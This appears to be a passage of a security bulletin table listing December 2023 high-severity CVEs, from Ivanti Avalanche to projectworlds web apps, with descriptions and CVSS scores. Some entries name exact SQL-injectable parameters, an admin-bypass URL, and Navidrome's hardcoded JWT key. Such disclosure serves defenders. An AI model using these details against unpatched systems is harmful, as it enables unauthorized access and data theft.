ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46216 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46217 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46220 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46221 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46222 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46223 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46224 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46225 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46257 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46258 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46259 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46260 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-46261 support@hackerone.com |
ivanti -- avalanche | An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution. | 2023-12-19 | 9.8 | CVE-2023-46263 support@hackerone.com |
ivanti -- avalanche | An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remove code execution. | 2023-12-19 | 9.8 | CVE-2023-46264 support@hackerone.com |
ivanti -- avalanche | An unauthenticated could abuse a XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF). | 2023-12-19 | 9.8 | CVE-2023-46265 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS). | 2023-12-19 | 7.5 | CVE-2023-46803 support@hackerone.com |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS). | 2023-12-19 | 7.5 | CVE-2023-46804 support@hackerone.com |
ivanti -- connect_secure | A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance. | 2023-12-16 | 7.5 | CVE-2023-39340 support@hackerone.com |
jetbrains -- teamcity | In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible | 2023-12-15 | 8.8 | CVE-2023-50870 cve@jetbrains.com |
kaifa -- webitr_attendance_system | Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator's account, to execute login account's permissions, and obtain relevant information. | 2023-12-15 | 9.8 | CVE-2023-48392 twcert@cert.org.tw |
kaifa_technology -- webitr_attendance_system | Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. | 2023-12-15 | 8.8 | CVE-2023-48394 twcert@cert.org.tw |
kakadu_software_pty_ltd -- kakadu_sdk | JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted the image that is displayed back to the attacker. | 2023-12-20 | 7.5 | CVE-2023-6562 cve-coordination@google.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49677 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49678 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49679 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49680 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49681 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDate' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49682 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49683 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49684 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTime' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49685 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49686 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtPass' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49687 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtUser' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49688 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'JobId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49689 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'WalkinId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49690 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- student_information_system | Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'id' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-5007 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- student_information_system | Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-5010 help@fluidattacks.com help@fluidattacks.com |
kashipara_group -- student_information_system | Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursename' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-5011 help@fluidattacks.com help@fluidattacks.com |
kodcloud -- kodbox | A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6848 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
kodcloud -- kodbox | A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6849 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
kodcloud -- kodexplorer | A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6850 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
kodcloud -- kodexplorer | A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219. | 2023-12-16 | 9.8 | CVE-2023-6851 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
kodcloud -- kodexplorer | A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220. | 2023-12-16 | 9.8 | CVE-2023-6852 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
kodcloud -- kodexplorer | A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6853 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
kylinsoft -- hedron-domain-hook | A vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 7.8 | CVE-2023-7025 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
lfprojects -- mlflow | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. | 2023-12-15 | 8.1 | CVE-2023-6831 security@huntr.dev security@huntr.dev |
linux -- kernel | A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system. | 2023-12-21 | 7.8 | CVE-2023-6546 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
linux -- kernel | A heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation. A perf_event's read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b. | 2023-12-19 | 7.8 | CVE-2023-6931 cve-coordination@google.com cve-coordination@google.com |
linux -- kernel | A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1. | 2023-12-19 | 7.8 | CVE-2023-6932 cve-coordination@google.com cve-coordination@google.com |
linux -- linux_kernel | A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a. | 2023-12-18 | 7.8 | CVE-2023-6817 cve-coordination@google.com cve-coordination@google.com cve-coordination@google.com cve-coordination@google.com |
m-files_corporation -- m-files_server | Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords. | 2023-12-20 | 7.5 | CVE-2023-6912 security@m-files.com |
majordomo -- majordomo | MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. | 2023-12-15 | 9.8 | CVE-2023-50917 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
master_slider -- master_slider_pro | Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.T his issue affects Master Slider Pro: from n/a through 3.6.5. | 2023-12-20 | 7.1 | CVE-2023-47507 audit@patchstack.com |
mindsdb -- mindsdb | MindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server. | 2023-12-22 | 9.1 | CVE-2023-50731 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
misp -- misp | app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs. | 2023-12-15 | 9.8 | CVE-2023-50918 cve@mitre.org cve@mitre.org |
mlflow -- mlflow | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. | 2023-12-18 | 7.5 | CVE-2023-6909 security@huntr.dev security@huntr.dev |
moxa -- iologik_e1200_series | A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user. | 2023-12-23 | 8.8 | CVE-2023-5961 psirt@moxa.com |
mozilla -- firefox | TypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6866 security@mozilla.org security@mozilla.org |
mozilla -- firefox | Memory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6873 security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- firefox_esr/thunderbird | A use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6. | 2023-12-19 | 8.8 | CVE-2023-6862 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6856 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | Firefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6858 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | A use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6859 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6861 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6863 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mozilla -- multiple_products | Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6864 security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org security@mozilla.org |
mr-corner -- amazing_little_poll | Authentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the "lp_admin.php?adminstep=" parameter. | 2023-12-20 | 9.8 | CVE-2023-6768 cve-coordination@incibe.es |
multisuns -- easylog_web\+_firmware | Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48388 twcert@cert.org.tw |
multisuns -- easylog_web\+_firmware | Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48390 twcert@cert.org.tw |
multisuns -- easylog_web\+_firmware | Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48389 twcert@cert.org.tw |
navidrome -- navidrome | Navidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome's subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key "not so secret". The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don't protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2. | 2023-12-21 | 8.6 | CVE-2023-51442 security-advisories@github.com security-advisories@github.com |
netentsec -- application_security_gateway | A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6903 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
netgear -- wnr2000_firmware | A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. | 2023-12-15 | 9.8 | CVE-2023-50089 cve@mitre.org cve@mitre.org |
nxfilter -- nxfilter | A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-18 | 9.8 | CVE-2023-6905 cna@vuldb.com cna@vuldb.com |
nxfilter -- nxfilter | A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-17 | 8.8 | CVE-2023-6904 cna@vuldb.com cna@vuldb.com |
octokit -- app | octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. | 2023-12-15 | 7.5 | CVE-2023-50728 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
openbsd -- openssh | In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. | 2023-12-18 | 9.8 | CVE-2023-51385 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
openimageio -- openimageio | A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service. | 2023-12-18 | 7.5 | CVE-2023-3430 secalert@redhat.com nvd@nist.gov |
panasonic -- control_fpwin_pro | Stack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. | 2023-12-19 | 7.8 | CVE-2023-6314 product-security@gg.jp.panasonic.com |
panasonic -- control_fpwin_pro | Out-of-bouds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. | 2023-12-19 | 7.8 | CVE-2023-6315 product-security@gg.jp.panasonic.com |
peazip -- peazip | A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release. | 2023-12-17 | 7.8 | CVE-2023-6891 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
perl -- perl | A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer. | 2023-12-18 | 7 | CVE-2023-47038 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
phz76 -- rtspserver | A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-17 | 9.8 | CVE-2023-6888 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
projectworlds -- online_voting_system_project | Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-48433 help@fluidattacks.com help@fluidattacks.com |
projectworlds -- online_voting_system_project | Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-48434 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- leave_management_system_project | Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setearnleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 8.8 | CVE-2023-44481 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- leave_management_system_project | Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setsickleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 8.8 | CVE-2023-44482 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'ch' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45115 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'demail' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45116 help@fluidattacks.com help@fluidattacks.com |
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'eid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45117 help@fluidattacks.com help@fluidattacks.com |
